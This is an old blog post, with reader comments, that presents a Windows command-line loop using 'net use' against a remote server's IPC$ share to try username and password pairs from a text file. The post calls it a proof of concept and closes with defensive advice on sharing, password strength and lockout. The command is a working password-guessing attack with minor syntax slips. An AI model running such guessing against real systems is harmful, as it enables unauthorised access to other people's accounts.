Wednesday, January 25, 2012

Password Audit Tools

password audit tools
Introduction
A password is  sequence of characters used to to authenticate certain user when they request for an access. Due to the growth of the technology, breaking a password have become more common and there is a lot of tools that are available for download. On this article I won't be covering any tools, but I will give you a sample script that you can use to break some password.


The requirement for this attempt will be a windows machine and a command prompt. This is not a joke. Hacker can't be tell from their appearance. They just can be a normal users. They don't have a need to have administrator access to the desktop where they launch attack.What I didn't cover in this article will be finding the dictionary files. You can google it to find a good source as this article is just a proof of concept and it don't have any mean to perform or encourage any damage.

Configuration
Let get our hand dirty, first what you need to do is type the following at your command prompt.You will need to have a credential files which is password.txt. The format of the password.txt will be following: 

Password      Username
mypassword administrator
password1    admin

Next will be executing the command and you will be able to check the password
FOR /F "token=1, 2*" %i in (password.txt) do net use \\remoteserver\ipc$ %i /u:%j

If you have tested the above, you will see that a hacker doesn't need to have a good skill in running exploit. What they can do is attacking common human mistake. To avoid the above to happen, I would recommend the following and it is cost free. In my next article I will show you the same attempt, but this round I will use linux as my operating system.
  1. Disable file and print sharing if its not in used
  2. Implement a strong password
  3. Implement an account lockout policy
I am interested in hearing your feedback, so that I can improve my articles and learning resources for you.

Reference
Checking windows password audit tool 

3 comments:

  1. Thanks for these tech tips on audit. It will add to my productivity on the matter.

    ReplyDelete
    Replies
    1. You are most welcome, will come out more with ideas on this area.

      Delete
  2. niceeee & informative post. i think it ur post is most informative for everyone. specially for me. thanks for sharing.

    ReplyDelete